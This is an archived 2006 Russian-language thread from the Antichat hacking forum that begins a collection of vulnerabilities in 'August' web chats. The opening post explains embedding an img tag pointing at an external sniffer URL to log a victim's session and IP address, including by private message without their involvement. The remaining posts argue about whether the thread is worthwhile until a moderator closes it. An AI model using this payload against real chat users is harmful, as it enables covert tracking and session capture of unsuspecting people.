Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)
-   -   Чаты Августа (https://forum.antichat.xyz/showthread.php?t=19855)

Хозяин 29.05.2006 15:28

Чаты Августа
 
Народ, давайте в этой тебе постить уязвимости найденные в данном типе чатов (слишком мало информации по ним)

Только без всякого флуда! Нашел уязвимость - отписался.
Вопросов в этой теме тоже не надо. Пусть будет как сборник уязвимостей.

Внедрение сниффера (толку от этого мало, но все что пока сам нашел ... )
Для того, чтобы внедрить сниффер, нам нужны теги (кто общался с этими чатами, знает, что "html - теги, как привелегия выдаются по достижению определенного колличества часов проведенных в чате, ну или СИ, просите у админа ))

Дальше все просто )

Когда вы уже будете иметь данную привелегию, вы соответственно сможете вставлять картинку во фрейм чата вот так:

<img src=http://ссылка_на_ваш_рисунок>
Элементарно, вместо ссылки на рисуном, вставляем адес сниффера:

<img src=http://antichat.org/s/[ваш логин].gif>

Как я уже и сказал, толку от этого мало, сниффак ловит только сессию (с ней ничего сделать нельзя к сожалению) и айпи.

Единственная хоть и маленькая "полезность" - это то, что вы можете вставить код и отправить его в личку человеку, IP которого вы хотите узнать, без всякого его участия. (в логах будет ваш айпи и жертвы)

По тегам буду смотреть дальше, может что и нарою ... но уж очень хорошо там они фильтруются ...

Tem 29.05.2006 20:58

Была очень опширная тема насчёт августа, просто надо кректно искать, тама описсаны баги в этих чатах, зачем ешё одна тема ?

Антошка2003 31.05.2006 16:16

найденные уязвимости сюда выкладывать нету смысла, ибо они в скором времени закрываються.

syntacsis 31.05.2006 16:20

Цитата:

Сообщение от Антошка2003
найденные уязвимости сюда выкладывать нету смысле, ибо они в скором времени закрываються.

Абсолютно точно. Причем закрываются не в скором времени, а мгновенно. Так что лучше не выкладывать тут с трудом найденную багу, чтобы ее не лишиться. Итак чат Августа довольно неплохо защищен от киддисов.

Хозяин 31.05.2006 19:45

Tem, это не тема, здесь рассуждать никому не предлагается, это "сборник"!

Цитата:

Только без всякого флуда! Нашел уязвимость - отписался.
Вопросов в этой теме тоже не надо. Пусть будет как сборник уязвимостей.

ннда ...

syntacsis, без твоего поттверждения здесь никак бы не обошлись?
Цитата:

Абсолютно точно
Смысл каков в твоем посте?!

P.S. Смысл раздела "Уязвимости чата" в чем?!
это так ... риторика ...

Антошка2003 31.05.2006 23:10

Цитата:

p.s. Смысл раздела "Уязвимости чата" в чем?!
уже августа обсудили на все 95%. смысл говорить о нём далее? гонять одни и теже уязвимости из одной темы в другую?

Nova 31.05.2006 23:19

Я тоже думаю прошлая тема про чаты августа была очень обшираня в скором времени я сделаю выборку из того раздела и прикреплю её а эту тему закрываю !


Время: 08:55